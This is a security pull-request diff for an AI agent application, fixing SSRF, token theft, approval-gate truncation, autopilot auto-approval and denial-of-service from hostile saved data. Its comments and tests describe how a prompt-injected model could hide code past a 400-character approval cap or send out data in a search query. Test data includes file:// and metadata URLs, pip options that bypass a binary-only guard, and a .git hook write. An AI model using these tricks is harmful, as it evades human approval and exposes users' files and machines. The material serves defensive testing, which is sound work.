### PR TITLE
Security pass: 11 fixes (2 code-exec/token-theft, SSRF, DoS-from-hostile-disk, approval-gate disclosure)

### DIFF
--- a/api_provider.py
+++ b/api_provider.py
@@ -2064,6 +2064,26 @@ def _extract_openai_image_bytes(response) -> bytes:
     if not image_url and isinstance(first_item, dict):
         image_url = first_item.get("url")
     if image_url:
+        # SECURITY-FIX: image_url comes verbatim from the image endpoint's
+        # response - the OpenAI-compatible base_url is user-configurable and,
+        # under the threat model, a hostile or MITM'd provider response
+        # (boundary (d)) is untrusted. urllib.request.urlopen installs the
+        # file://, data: and ftp: handlers by default, so an unchecked URL
+        # here let a response body read an arbitrary LOCAL file (proven:
+        # file:///.../secret returned the file's bytes) or hit an internal
+        # host - classic SSRF - with the bytes then persisted and served
+        # back. The web_research subsystem already solved exactly this for
+        # LLM-reached URLs; reuse its audited FetchPolicy (https-only,
+        # rejects private/loopback/link-local/metadata addresses) rather
+        # than rolling a second, weaker check here.
+        from graphlink_plugins.web_research.fetch_policy import FetchPolicy, URLPolicyError
+
+        try:
+            FetchPolicy().validate(image_url)
+        except URLPolicyError as exc:
+            raise RuntimeError(
+                f"Image endpoint returned a URL blocked by fetch policy: {exc}"
+            ) from exc
         try:
             with urllib.request.urlopen(image_url, timeout=120) as resp:
                 return resp.read()

--- a/backend/agents.py
+++ b/backend/agents.py
@@ -492,7 +492,26 @@ class AgentDispatcher:
                     "MCP server connected", extra={"kind": "builder"},
                 )
                 _ = registered
-            except (McpError, OSError) as exc:
+            except (McpError, OSError, ValueError) as exc:
+                # SECURITY-FIX: ValueError was NOT caught here, only McpError/
+                # OSError. registry.register() raises ValueError on a
+                # duplicate tool name, an unknown approval policy, or an
+                # unknown scope - all of which a hostile-or-updated MCP
+                # server (its tools/list returning two same-named tools -
+                # threat (d)) or a hand-edited session.dat (an approval/scope
+                # value outside the registry vocabulary - threat (c), since
+                # the settings store passes those through unvalidated) can
+                # trigger, as can an ordinary user configuring two servers
+                # with the same name (the store allows it). It escaped this
+                # loop into start_builder_run's task, which has only a
+                # `finally: release` - so run_build never ran, no _land()/
+                # notification fired, the Builder registry was never cached,
+                # and every subsequent Start re-spawned every server and
+                # crashed again, leaking a subprocess each time (client.close
+                # below was skipped on this path). Catching it here restores
+                # the per-server tolerance this loop's own contract promises:
+                # the bad server is logged and skipped, its client closed,
+                # and the Builder still starts with every other server.
                 logger.warning("MCP server %r unavailable: %s", config_entry.name, exc)
                 try:
                     client.close()

--- a/backend/builder.py
+++ b/backend/builder.py
@@ -419,7 +419,15 @@ def _approval_summary(call: ToolCall, document) -> str:
 
     code = run_node_pending_code(document, call)
     if code is not None:
-        return f"{call.name} will run this code:\n{_truncate(code, _APPROVAL_SUMMARY_CAP)}"
+        # SECURITY-FIX: NOT truncated. The cap below exists to keep an
+        # argument blob readable; applied to the code it meant everything
+        # past character 400 executed without ever being shown to the
+        # approver - a prompt-injected model just pads a benign prologue
+        # and puts the payload after the cut. The panel renders this in a
+        # scrollable <pre> (plan-node-approval-summary), so length costs
+        # nothing; the approver sees exactly the bytes PythonREPL.execute()
+        # will run.
+        return f"{call.name} will run this code:\n{code}"
     args = json.dumps(call.arguments, sort_keys=True, ensure_ascii=False)
     return f"{call.name} {_truncate(args, _APPROVAL_SUMMARY_CAP)}"
 
@@ -538,7 +546,19 @@ async def run_build(
             # silently auto-running. Scope labels are config metadata, not
             # enforcement; "declared safe" must be an explicit, non-empty
             # claim to auto-approve on.
-            if spec_scopes and spec_scopes <= _AUTOPILOT_AUTO_SCOPES:
+            # SECURITY-FIX: an approval="always" registration is the tool
+            # author saying "a human looks at EVERY call, whatever the
+            # mode" - graph.delete_node registers that way precisely
+            # because a delete destroys content the user may not have
+            # read yet. This router only ever looked at scopes, so a
+            # delete (scope graph.mutate, inside the autopilot set) was
+            # auto-approved anyway, and the policy was decorative. Scope
+            # fit is necessary for auto-approval, not sufficient.
+            if (
+                spec_scopes
+                and spec_scopes <= _AUTOPILOT_AUTO_SCOPES
+                and registry.approval_for(call.name) != "always"
+            ):
                 return True
         future: asyncio.Future = loop.create_future()
         handle.approval_future = future

--- a/backend/builder.py
+++ b/backend/builder.py
@@ -415,19 +415,20 @@ def _approval_summary(call: ToolCall, document) -> str:
     why). Every other tool's arguments already say what will happen, so
     they keep the plain JSON summary; only this one case substitutes the
     code itself."""
-    from backend.tools_graph import run_node_pending_code
+    from backend.tools_graph import run_node_pending_disclosure
 
-    code = run_node_pending_code(document, call)
-    if code is not None:
+    disclosure = run_node_pending_disclosure(document, call)
+    if disclosure is not None:
         # SECURITY-FIX: NOT truncated. The cap below exists to keep an
-        # argument blob readable; applied to the code it meant everything
-        # past character 400 executed without ever being shown to the
-        # approver - a prompt-injected model just pads a benign prologue
-        # and puts the payload after the cut. The panel renders this in a
-        # scrollable <pre> (plan-node-approval-summary), so length costs
-        # nothing; the approver sees exactly the bytes PythonREPL.execute()
-        # will run.
-        return f"{call.name} will run this code:\n{code}"
+        # argument blob readable; applied to the disclosed code/query it
+        # meant everything past character 400 was acted on without ever
+        # being shown to the approver - a prompt-injected model just pads a
+        # benign prologue and puts the payload (the code that runs, or the
+        # query sent to the external search provider) after the cut. The
+        # panel renders this in a scrollable <pre>
+        # (plan-node-approval-summary), so length costs nothing; the
+        # approver sees exactly what will run or go out over the network.
+        return f"{call.name} {disclosure}"
     args = json.dumps(call.arguments, sort_keys=True, ensure_ascii=False)
     return f"{call.name} {_truncate(args, _APPROVAL_SUMMARY_CAP)}"
 

--- a/backend/domain/content_codec.py
+++ b/backend/domain/content_codec.py
@@ -93,6 +93,29 @@ def _process_content_for_deserialization(content):
                 except (binascii.Error, ValueError):
                     logging.exception("Failed to decode base64 image data during deserialization.")
                     processed_parts.append({"type": "text", "text": "[ERROR: Image Data Corrupted]"})
+            elif isinstance(part, dict) and part.get("type") == "audio_file":
+                # SECURITY-FIX: an audio_file part is a bare filesystem PATH
+                # that the provider layer opens lazily at SEND time
+                # (api_provider._read_attachment_bytes, openai_provider's
+                # input_audio, the Gemini Files upload). An image is
+                # persisted as its own base64 BYTES (decoded just above), so
+                # it is self-contained and safe to reload; audio persists
+                # only the path, and nothing records which paths the user
+                # actually staged, so once a chat is on disk there is no way
+                # to tell a user-attached path from one an attacker wrote
+                # into the row. A hostile chats.db row or imported .graphlink
+                # archive could carry {"type":"audio_file","path":"<any local
+                # file, e.g. an SSH key>"} - invisible in the UI (the SPA
+                # never renders audio_file, and the text mirror shows
+                # nothing) - and the first follow-up turn on that branch
+                # would read that file and ship it to the model provider
+                # (uploaded to Google, for Gemini). Reloaded audio is
+                # therefore neutralized to an inert text placeholder here,
+                # at the load-from-disk boundary: a live staged attachment
+                # in the SAME session still sends normally (it never passes
+                # through deserialization), but no path from persisted data
+                # is ever handed back to the provider layer.
+                processed_parts.append({"type": "text", "text": "[Audio attachment - reattach to include it]"})
             else:
                 processed_parts.append(part)
         return processed_parts

--- a/backend/plugin_sdk.py
+++ b/backend/plugin_sdk.py
@@ -407,6 +407,25 @@ class BuiltinActionSpec:
     handler: BuiltinActionHandler
 
 
+# SECURITY-FIX: register_builtin_plugin (below) attaches a picker action that
+# _execute_discovered_plugin runs UN-gated by any install-time grant and that
+# is INVISIBLE in Settings > Plugins - deliberately, because the docstring's
+# stated purpose is migrating the 8 pre-SDK first-party built-ins without
+# renaming their shipped kind strings. But the method is public on the same
+# HostContext every plugin's register() receives, and nothing restricted it
+# to first-party callers: a third-party plugin could call it and thereby run
+# its handler with the live SceneDocument on every picker click, with no
+# consent prompt and no row in the consent UI. The hatch is now restricted to
+# exactly the first-party plugin ids that legitimately use it (grep-confirmed:
+# these are the only plugins/ packages that call register_builtin_plugin); any
+# other plugin_id calling it is a discovery-time PluginRegistrationError, which
+# is caught and surfaced as a load error rather than run.
+_BUILTIN_HATCH_ALLOWED_PLUGIN_IDS = frozenset({
+    "artifact", "code_sandbox", "conversation_node", "gitlink",
+    "html_renderer", "pycoder", "system_prompt", "web_research",
+})
+
+
 class HostContext:
     """Constructed fresh per plugin, once, at discovery time - NEVER shared
     across plugins, so plugin_id provenance is free on every call and one
@@ -563,6 +582,17 @@ class HostContext:
         register_builtin_plugin names) are checked once, globally, by
         _merge_into_registry - not here, since a single HostContext never
         sees another plugin's declarations."""
+        if self.plugin_id not in _BUILTIN_HATCH_ALLOWED_PLUGIN_IDS:
+            # SECURITY-FIX: see _BUILTIN_HATCH_ALLOWED_PLUGIN_IDS above. A
+            # third-party plugin must use register_node_kind /
+            # register_picker_entry (both grant-gated and visible in
+            # Settings), never this un-gated, consent-invisible first-party
+            # migration hatch.
+            raise PluginRegistrationError(
+                f'plugin "{self.plugin_id}": register_builtin_plugin is reserved for '
+                f"first-party built-ins; use register_node_kind or "
+                f"register_picker_entry instead."
+            )
         if name in self._builtin_actions:
             raise PluginRegistrationError(
                 f'plugin "{self.plugin_id}": builtin action "{name}" already registered by '

--- a/backend/session_load.py
+++ b/backend/session_load.py
@@ -183,6 +183,7 @@ from __future__ import annotations
 
 import contextvars
 import logging
+import math
 import re
 import uuid
 from typing import Any
@@ -346,10 +347,29 @@ def _resolve_ref(
     return None
 
 
+def _finite_float(value: Any, default: float = 0.0) -> float:
+    """SECURITY-FIX: float() accepts the non-standard JSON literals NaN,
+    Infinity and -Infinity (json.loads parses them by default), and a
+    saved chat row or imported archive is hostile-data-on-disk. A
+    non-finite coordinate/size/zoom restored into the live SceneDocument
+    then rides scene_payload() into starlette's send_json (allow_nan=True),
+    which emits literal `NaN`/`Infinity` tokens - invalid JSON the SPA's
+    JSON.parse rejects, so it silently DROPS every scene frame from then
+    on: the canvas freezes for the whole session (the "bricks the scene
+    channel" DoS). Coercing any non-finite value to a safe default here
+    lets the chat still load, just with the poisoned number replaced,
+    instead of either crashing or wedging the wire."""
+    try:
+        result = float(value)
+    except (TypeError, ValueError):
+        return default
+    return result if math.isfinite(result) else default
+
+
 def _position(payload: dict[str, Any]) -> tuple[float, float]:
     position = payload.get("position")
     if isinstance(position, dict):
-        return float(position.get("x", 0.0)), float(position.get("y", 0.0))
+        return _finite_float(position.get("x", 0.0)), _finite_float(position.get("y", 0.0))
     return 0.0, 0.0
 
 
@@ -397,7 +417,7 @@ def _restore_chat_payload(payload: dict[str, Any]) -> SceneNode:
             # relabel every AI response in an old save as if the user had
             # typed it.
             is_user=bool(payload.get("is_user", True)),
-            chat_scroll_value=float(payload.get("scroll_value", 0.0) or 0.0),
+            chat_scroll_value=_finite_float(payload.get("scroll_value", 0.0) or 0.0),
             provider=payload.get("provider"),
             model=payload.get("model"),
             is_branch_synthesis=bool(payload.get("is_branch_synthesis", False)),
@@ -1084,7 +1104,7 @@ def _restore_charts(
                 document.toggle_chart_aspect_lock(chart.id)
             size = chart_payload.get("size")
             if isinstance(size, dict) and "width" in size and "height" in size:
-                document.resize_chart(chart.id, float(size["width"]), float(size["height"]))
+                document.resize_chart(chart.id, _finite_float(size["width"]), _finite_float(size["height"]))
         except Exception:
             continue
         charts_map[index] = chart.id
@@ -1134,9 +1154,9 @@ def _restore_frames(
             size = frame_payload.get("size")
             width_height = None
             if isinstance(rect, dict) and "width" in rect and "height" in rect:
-                width_height = (float(rect["width"]), float(rect["height"]))
+                width_height = (_finite_float(rect["width"]), _finite_float(rect["height"]))
             elif isinstance(size, dict) and "width" in size and "height" in size:
-                width_height = (float(size["width"]), float(size["height"]))
+                width_height = (_finite_float(size["width"]), _finite_float(size["height"]))
             if width_height is not None:
                 document.resize_frame(frame.id, width_height[0], width_height[1])
             # The POSITION half of that same override, and for the identical
@@ -1160,7 +1180,7 @@ def _restore_frames(
             # untouched.
             position_xy = None
             if isinstance(rect, dict) and "x" in rect and "y" in rect:
-                position_xy = (float(rect["x"]), float(rect["y"]))
+                position_xy = (_finite_float(rect["x"]), _finite_float(rect["y"]))
             elif isinstance(frame_payload.get("position"), dict):
                 position_xy = _position(frame_payload)
             if position_xy is not None:
@@ -1472,7 +1492,7 @@ def _restore_view_state(document: SceneDocument, chat_data: dict[str, Any]) -> N
         scroll_x = scroll.get("x", scroll_x)
         scroll_y = scroll.get("y", scroll_y)
     try:
-        document.set_view_state(float(zoom), float(scroll_x), float(scroll_y))
+        document.set_view_state(_finite_float(zoom), _finite_float(scroll_x), _finite_float(scroll_y))
     except Exception:
         pass
 

--- a/backend/tests/test_agents.py
+++ b/backend/tests/test_agents.py
@@ -7987,3 +7987,62 @@ def test_register_agents_forwards_the_provider_runtime_to_the_dispatcher():
     )
 
     assert dispatcher._provider_runtime is runtime
+
+
+# -- SECURITY-FIX: one bad MCP server must not crash the whole Builder registry
+# -- or leak its subprocess (ValueError from registry.register was uncaught) ---
+
+
+class _McpFakeSettingsManager:
+    def __init__(self, servers):
+        self._servers = servers
+
+    def get_enable_system_prompt(self) -> bool:
+        return True
+
+    def get_mcp_servers(self):
+        return list(self._servers)
+
+
+def test_a_mcp_server_that_raises_valueerror_on_register_is_skipped_and_its_client_closed(monkeypatch):
+    """register_mcp_server_tools raises ValueError on a duplicate tool name /
+    unknown approval / unknown scope - from a hostile-or-updated server
+    (threat d) or a hand-edited session.dat (threat c). It used to escape the
+    per-server loop (caught only McpError/OSError), crashing the Builder
+    registry build and leaking the connected subprocess. The bad server must
+    now be skipped, its client closed, and the good server still registered."""
+    import backend.mcp_client as mcp_client_module
+    from backend.tools import ToolRegistry
+
+    closed = []
+
+    class _FakeClient:
+        def __init__(self, **kwargs):
+            self.kwargs = kwargs
+        def connect(self):
+            pass
+        def close(self):
+            closed.append(self)
+
+    def fake_register(registry, client, config):
+        if config.name == "bad":
+            raise ValueError("Tool 'mcp:bad:x' is already registered.")
+        return (f"mcp:{config.name}:ok",)
+
+    monkeypatch.setattr(mcp_client_module, "McpStdioClient", _FakeClient)
+    monkeypatch.setattr(mcp_client_module, "register_mcp_server_tools", fake_register)
+
+    servers = [
+        {"id": "1", "name": "bad", "command": "x", "args": [], "scopes": [], "approval": "always",
+         "enabled_tools": [], "enabled": True, "timeout": 30.0, "env": {}},
+        {"id": "2", "name": "good", "command": "y", "args": [], "scopes": [], "approval": "always",
+         "enabled_tools": [], "enabled": True, "timeout": 30.0, "env": {}},
+    ]
+    dispatcher = AgentDispatcher(_McpFakeSettingsManager(servers))
+    registry = ToolRegistry()
+
+    dispatcher._register_configured_mcp_tools(registry)  # must not raise
+
+    retained = getattr(dispatcher, "_mcp_clients", [])
+    assert len(retained) == 1, "only the good server's client is kept"
+    assert len(closed) == 1, "the bad server's connected client must be closed, not leaked"

--- a/backend/tests/test_api_provider_image_url_ssrf.py
+++ b/backend/tests/test_api_provider_image_url_ssrf.py
@@ -1,0 +1,59 @@
+"""SECURITY-FIX: _extract_openai_image_bytes validates a provider-returned
+image URL through the audited web_research FetchPolicy before downloading it.
+
+The OpenAI-compatible base_url is user-configurable, so an image-generation
+response is untrusted network input (threat boundary (d)). urllib.request.
+urlopen installs the file://, data: and ftp: handlers by default, so an
+unchecked `url` field in that response could read an arbitrary LOCAL file or
+reach an internal host (SSRF), with the bytes then persisted and served
+back. These tests pin that the scheme/private-address checks now run first.
+"""
+
+import base64
+from types import SimpleNamespace
+
+import pytest
+
+import api_provider
+
+
+def _response_with_url(url):
+    # Mirrors the OpenAI images response shape _extract_openai_image_bytes
+    # reads: response.data[0].url (b64_json absent so the URL branch runs).
+    return SimpleNamespace(data=[SimpleNamespace(b64_json=None, url=url)])
+
+
+def test_a_file_url_is_refused_before_any_local_read(tmp_path):
+    secret = tmp_path / "secret.txt"
+    secret.write_text("TOP SECRET", encoding="utf-8")
+
+    with pytest.raises(RuntimeError, match="blocked by fetch policy"):
+        api_provider._extract_openai_image_bytes(_response_with_url(secret.as_uri()))
+
+
+def test_a_data_url_is_refused():
+    data_url = "data:image/png;base64," + base64.b64encode(b"hello").decode("ascii")
+    with pytest.raises(RuntimeError, match="blocked by fetch policy"):
+        api_provider._extract_openai_image_bytes(_response_with_url(data_url))
+
+
+@pytest.mark.parametrize(
+    "url",
+    [
+        "http://127.0.0.1/x.png",          # loopback, and http scheme
+        "http://169.254.169.254/latest/",  # cloud metadata
+        "https://127.0.0.1/x.png",         # loopback over https
+        "ftp://example.com/x.png",         # non-http(s) scheme
+    ],
+)
+def test_private_or_non_https_urls_are_refused(url):
+    with pytest.raises(RuntimeError, match="blocked by fetch policy"):
+        api_provider._extract_openai_image_bytes(_response_with_url(url))
+
+
+def test_a_b64_json_response_never_touches_the_network_or_the_policy():
+    # The common OpenAI path returns inline base64 and must still work with
+    # no URL validation involved at all.
+    payload = base64.b64encode(b"PNGBYTES").decode("ascii")
+    resp = SimpleNamespace(data=[SimpleNamespace(b64_json=payload)])
+    assert api_provider._extract_openai_image_bytes(resp) == b"PNGBYTES"

--- a/backend/tests/test_builder.py
+++ b/backend/tests/test_builder.py
@@ -356,6 +356,43 @@ class TestAutopilotNetworkGate:
         )
         assert node.state.builder_status == "done"
 
+    def test_run_node_research_approval_discloses_the_query_being_sent_out(self, monkeypatch):
+        """SECURITY-FIX: research prompts for net.fetch even in autopilot,
+        but the approval summary showed only {"action":"research","node_id":
+        ...} - never the query, which is the node's content and is sent to
+        the external search provider. A prompt-injected model could compose
+        an exfiltrating query the approver had no chance to see. The summary
+        must now disclose it."""
+        from graphlink_plugins.web_research import service as wr_service
+        from graphlink_plugins.web_research.domain import ResearchResult
+
+        document, dispatcher, registry, bus = make_harness()
+        parent = document.add_chat_node(0, 0, "ctx", True)
+        research = document.add_web_research_node(0, 200, parent.id)
+        research.content = "site:internal.corp leaked secret value"
+        monkeypatch.setattr(
+            wr_service.WebResearchService, "run",
+            lambda self, request, **kw: ResearchResult(
+                request_id=request.request_id, original_query=request.original_query,
+                effective_query=request.original_query, answer_markdown="answer",
+            ),
+        )
+        node = seed_plan(document, ["research it"])  # copilot: prompts
+        scripted_turns(monkeypatch, [
+            {"tool_calls": [call("c1", "run_node", node_id=research.id)]},
+            {"tool_calls": [call("c2", "builder.complete_step", summary="done")]},
+        ], [])
+        summaries: list = []
+
+        approvals, _ = asyncio.run(
+            drive_build(document, dispatcher, registry, bus, node, summaries=summaries)
+        )
+
+        assert approvals == ["run_node"]
+        assert "site:internal.corp leaked secret value" in summaries[0], (
+            "the outbound search query must be disclosed in the approval prompt"
+        )
+
 
 class TestRunNodeExecuteApprovalGate:
     """REVIEW-FIX regression: run_node(action="execute") on a pycoder node

--- a/backend/tests/test_builder.py
+++ b/backend/tests/test_builder.py
@@ -421,6 +421,52 @@ class TestRunNodeExecuteApprovalGate:
         )
         assert node.state.builder_status == "done"
 
+    def test_run_node_execute_approval_discloses_the_whole_code_not_a_400_char_prefix(self):
+        """SECURITY-FIX: the disclosure above was capped at
+        _APPROVAL_SUMMARY_CAP (400) characters - a prompt-injected model
+        pads a benign prologue past the cap and everything after it runs
+        without ever being shown. The approver must see the exact bytes
+        PythonREPL.execute() will run."""
+        document = SceneDocument()
+        parent = document.add_chat_node(0, 0, "ctx", True)
+        pycoder = document.add_pycoder_node(0, 200, parent.id)
+        prologue = "# " + ("harmless comment " * 40) + "\n"  # well past 400 chars
+        payload = "import os; os.system('the part that used to be hidden')"
+        pycoder.state.pycoder_code = prologue + payload
+        assert len(prologue) > builder_module._APPROVAL_SUMMARY_CAP
+
+        summary = builder_module._approval_summary(
+            call("c1", "run_node", node_id=pycoder.id), document,
+        )
+
+        assert payload in summary, "code past the old 400-char cap must be disclosed"
+        assert summary.endswith(payload), "no truncation marker may replace the tail"
+
+    def test_autopilot_still_prompts_for_a_tool_registered_approval_always(self, monkeypatch):
+        """SECURITY-FIX: graph.delete_node registers approval="always"
+        because a delete destroys content the user may not have read yet,
+        but autopilot's router only consulted scopes - graph.mutate fits
+        the autopilot set, so the delete was auto-approved and the policy
+        was decorative."""
+        document, dispatcher, registry, bus = make_harness()
+        victim = document.add_chat_node(0, 0, "user content the model wants gone", True)
+        node = seed_plan(document, ["tidy up"], mode="autopilot")
+        scripted_turns(monkeypatch, [
+            {"tool_calls": [call("c1", "graph.delete_node", node_id=victim.id)]},
+            {"tool_calls": [call("c2", "builder.complete_step", summary="done")]},
+        ], [])
+
+        approvals, denials = asyncio.run(
+            drive_build(document, dispatcher, registry, bus, node, deny_first=True)
+        )
+
+        assert approvals == ["graph.delete_node"], (
+            "an approval='always' tool must prompt in autopilot too"
+        )
+        assert denials == 1
+        assert victim.id in document.nodes, "the denied delete must not have happened"
+        assert node.state.builder_status == "done"
+
 
 class TestPlanPersistence:
     def test_round_trip_preserves_the_plan_and_normalizes_live_states(self):

--- a/backend/tests/test_builder.py
+++ b/backend/tests/test_builder.py
@@ -504,6 +504,46 @@ class TestRunNodeExecuteApprovalGate:
         assert victim.id in document.nodes, "the denied delete must not have happened"
         assert node.state.builder_status == "done"
 
+    def test_autopilot_does_not_auto_approve_a_plugin_tool_by_its_self_declared_scope(self, monkeypatch):
+        """SECURITY-FIX: plugin Builder tools register with scopes taken from
+        the plugin's OWN self-reported plugin.toml (backend/plugins.py's
+        register_plugin_tools) and approval="always". Autopilot's router used
+        to auto-approve any tool whose scopes fit its set - and a plugin
+        simply declares graph.mutate to fit. The trust signal there is
+        authored by the untrusted party itself, so a prompt-injected model
+        could run a granted plugin's tool with arbitrary side effects, no
+        human in the loop. The approval='always' registration now blocks
+        auto-approval regardless of the declared scope."""
+        from backend.providers.base import ToolSpec
+        from backend.tools import GRAPH_MUTATE, ToolResult
+
+        document, dispatcher, registry, bus = make_harness()
+        ran = []
+        registry.register(
+            ToolSpec(name="plugin:evil:write_file",
+                     description="a granted third-party plugin's action", input_schema={}),
+            handler=lambda call, ctx: ran.append(call) or ToolResult(content="did it"),
+            scopes={GRAPH_MUTATE},   # self-declared, fits _AUTOPILOT_AUTO_SCOPES
+            approval="always",       # every real plugin tool registers this way
+        )
+        node = seed_plan(document, ["use the plugin"], mode="autopilot")
+        scripted_turns(monkeypatch, [
+            {"tool_calls": [call("c1", "plugin:evil:write_file", path="/etc/x")]},
+            {"tool_calls": [call("c2", "builder.complete_step", summary="done")]},
+        ], [])
+
+        approvals, denials = asyncio.run(
+            drive_build(document, dispatcher, registry, bus, node, deny_first=True)
+        )
+
+        assert approvals == ["plugin:evil:write_file"], (
+            "a plugin tool must prompt in autopilot - its self-declared scope "
+            "is not a trust signal"
+        )
+        assert denials == 1
+        assert ran == [], "the denied plugin handler must not have run"
+        assert node.state.builder_status == "done"
+
 
 class TestPlanPersistence:
     def test_round_trip_preserves_the_plan_and_normalizes_live_states(self):

--- a/backend/tests/test_code_sandbox_only_binary.py
+++ b/backend/tests/test_code_sandbox_only_binary.py
@@ -562,6 +562,130 @@ class TestDirectReferenceRequirementsBypassOnlyBinary:
             "never executed"
         )
 
+class TestGuardDefeatingOptionLinesBypassOnlyBinary:
+    """SECURITY-FIX: option lines that are not package specifiers but that
+    DEFEAT (`--no-binary :all:`) or ROUTE AROUND (`-r`/`-c` nested files)
+    the --only-binary :all: guard. They sat on the generic option skip-list
+    and were waved straight through to pip."""
+
+    def test_no_binary_all_in_the_manifest_really_does_reverse_the_cli_flag(self, tmp_path, monkeypatch):
+        # The bypass itself, proven against real pip rather than assumed:
+        # with the pre-check disabled, a manifest carrying `--no-binary
+        # :all:` lets the hostile sdist's build_wheel() run even though
+        # --only-binary :all: is on the command line. (Same shape as
+        # TestDirectReferenceRequirementsBypassOnlyBinary's own proof.)
+        marker = tmp_path / "marker.txt"
+        sdist_path = _build_hostile_sdist(tmp_path, marker)
+        find_links_dir = tmp_path / "find_links"
+        find_links_dir.mkdir()
+        (find_links_dir / sdist_path.name).write_bytes(sdist_path.read_bytes())
+        sandbox = _make_sandbox_with_real_venv(tmp_path, "no-binary-bypass-proof")
+
+        from graphlink_plugins.code_sandbox import domain as sandbox_domain
+        monkeypatch.setattr(sandbox_domain, "_direct_reference_requirement_lines", lambda _text: [])
+
+        with pytest.raises(RuntimeError, match="Dependency installation failed"):
+            sandbox.sync_requirements(
+                f"hostile-pkg==0.0.1\n--no-binary :all:\n--no-index\n--find-links {find_links_dir.as_posix()}",
+                should_continue=lambda: True,
+            )
+        assert marker.exists(), (
+            "expected the hostile backend to RUN here - this test proves the "
+            "manifest's --no-binary :all: overrides the CLI --only-binary :all:, "
+            "which is the whole reason the pre-check must refuse that line"
+        )
+
+    def test_no_binary_all_in_the_manifest_is_refused_before_pip_runs(self, tmp_path):
+        marker = tmp_path / "marker.txt"
+        sdist_path = _build_hostile_sdist(tmp_path, marker)
+        find_links_dir = tmp_path / "find_links"
+        find_links_dir.mkdir()
+        (find_links_dir / sdist_path.name).write_bytes(sdist_path.read_bytes())
+        sandbox = _make_sandbox_with_real_venv(tmp_path, "no-binary-block-test")
+
+        with pytest.raises(RuntimeError, match="Dependency installation blocked"):
+            sandbox.sync_requirements(
+                f"hostile-pkg==0.0.1\n--no-binary :all:\n--no-index\n--find-links {find_links_dir.as_posix()}",
+                should_continue=lambda: True,
+            )
+        assert not marker.exists()
+
+    def test_a_nested_requirements_file_cannot_smuggle_a_direct_reference(self, tmp_path):
+        # The nested file's `pkg @ file://` line never passes through
+        # _direct_reference_requirement_lines - pip expands -r itself - so
+        # the `-r` line is what has to be refused.
+        marker = tmp_path / "marker.txt"
+        pkg_dir = tmp_path / "hostile_pkg_src"
+        pkg_dir.mkdir()
+        _write_hostile_backend(pkg_dir, marker)
+        nested = tmp_path / "nested-reqs.txt"
+        nested.write_text(f"hostile-pkg @ {pkg_dir.as_uri()}\n", encoding="utf-8")
+        sandbox = _make_sandbox_with_real_venv(tmp_path, "nested-r-block-test")
+
+        with pytest.raises(RuntimeError, match="Dependency installation blocked"):
+            sandbox.sync_requirements(
+                f"-r {nested.as_posix()}",
+                should_continue=lambda: True,
+            )
+        assert not marker.exists()
+
+    @pytest.mark.parametrize(
+        "line",
+        [
+            "--no-binary :all:",
+            "--no-binary=hostile-pkg",
+            "-r other.txt",
+            "--requirement other.txt",
+            "-r https://example.invalid/reqs.txt",
+            "-c constraints.txt",
+            "--constraint=constraints.txt",
+            "--global-option=--evil",
+            "--install-option=--evil",
+            "--config-settings=x=y",
+            "--no-build-isolation",
+        ],
+    )
+    def test_each_guard_defeating_option_line_is_flagged(self, line):
+        from graphlink_plugins.code_sandbox.domain import _direct_reference_requirement_lines
+
+        assert _direct_reference_requirement_lines(f"requests==2.31.0\n{line}\n") == [line]
+
+    @pytest.mark.parametrize(
+        "line",
+        [
+            "--no-index",
+            "--find-links ./wheels",
+            "--index-url https://pypi.org/simple",
+            "--extra-index-url https://pypi.org/simple",
+            "--only-binary :all:",
+            "--prefer-binary",
+            "--require-hashes",
+            "--pre",
+            "--no-deps",
+            "--trusted-host pypi.org",
+        ],
+    )
+    def test_wheel_source_selection_options_stay_allowed(self, line):
+        from graphlink_plugins.code_sandbox.domain import _direct_reference_requirement_lines
+
+        assert _direct_reference_requirement_lines(f"requests==2.31.0\n{line}\n") == []
+
+    def test_allow_source_builds_true_still_lets_no_binary_reach_pip(self, tmp_path, monkeypatch):
+        sandbox = VirtualEnvSandbox("no-binary-escalation-test")
+        sandbox.base_dir = tmp_path
+        sandbox.requirements_file = tmp_path / "requirements.txt"
+        sandbox.requirements_hash_file = tmp_path / ".requirements.sha256"
+        sandbox.venv_dir = tmp_path / "venv"
+        captured = {}
+        monkeypatch.setattr(sandbox, "_run_subprocess", lambda args, **kw: captured.setdefault("args", args) and ("", 0) or ("", 0))
+
+        sandbox.sync_requirements(
+            "requests==2.31.0\n--no-binary :all:", should_continue=lambda: True, allow_source_builds=True,
+        )
+        assert "args" in captured, "the explicit opt-in must still reach pip"
+
+
+class TestOrdinaryManifestsStillReachPip:
     def test_an_ordinary_pinned_manifest_is_not_flagged_and_still_reaches_pip(self, tmp_path, monkeypatch):
         # False-positive guard, in TestPipCommandIncludesTheFlags's own fast
         # (non-subprocess-executing) style: an everyday manifest - including

--- a/backend/tests/test_gitlink_domain.py
+++ b/backend/tests/test_gitlink_domain.py
@@ -343,6 +343,45 @@ def test_normalize_repo_path_rejects_alternate_data_stream_colon():
         _normalize_repo_path("file.txt:hidden")
 
 
+@pytest.mark.parametrize(
+    "path",
+    [
+        ".git/config",
+        ".git/hooks/pre-commit",
+        ".GIT/hooks/post-checkout",
+        "vendor/lib/.git/config",
+        ".git",
+    ],
+)
+def test_normalize_repo_path_rejects_any_dot_git_segment(path):
+    """SECURITY-FIX: a change set writing .git/hooks/* or .git/config is
+    arbitrary code execution on the user's next git command - inside
+    local_root, so every containment guard passed it through."""
+    with pytest.raises(RuntimeError, match=r"\.git"):
+        _normalize_repo_path(path)
+
+
+def test_normalize_repo_path_still_allows_a_file_merely_named_like_git():
+    # Only the exact ".git" segment is refused - ".gitignore", "git/", and
+    # "legit.git.txt" are ordinary repo content.
+    assert _normalize_repo_path(".gitignore") == ".gitignore"
+    assert _normalize_repo_path("git/README.md") == "git/README.md"
+    assert _normalize_repo_path("src/legit.git.txt") == "src/legit.git.txt"
+
+
+def test_apply_change_set_refuses_to_write_into_dot_git(tmp_path):
+    from graphlink_plugins.gitlink.repository import apply_change_set
+
+    (tmp_path / ".git" / "hooks").mkdir(parents=True)
+    (tmp_path / ".git" / "config").write_text("[core]\n", encoding="utf-8")
+    with pytest.raises(RuntimeError, match=r"\.git"):
+        apply_change_set(tmp_path, [
+            {"path": ".git/hooks/pre-commit", "operation": "create", "content": "#!/bin/sh\ncalc\n"},
+        ])
+    assert not (tmp_path / ".git" / "hooks" / "pre-commit").exists()
+    assert (tmp_path / ".git" / "config").read_text(encoding="utf-8") == "[core]\n"
+
+
 def test_safe_local_target_resolves_inside_root(tmp_path):
     target = _safe_local_target(tmp_path, "src/module.py")
     assert target == (tmp_path / "src" / "module.py").resolve()

--- a/backend/tests/test_plugin_sdk.py
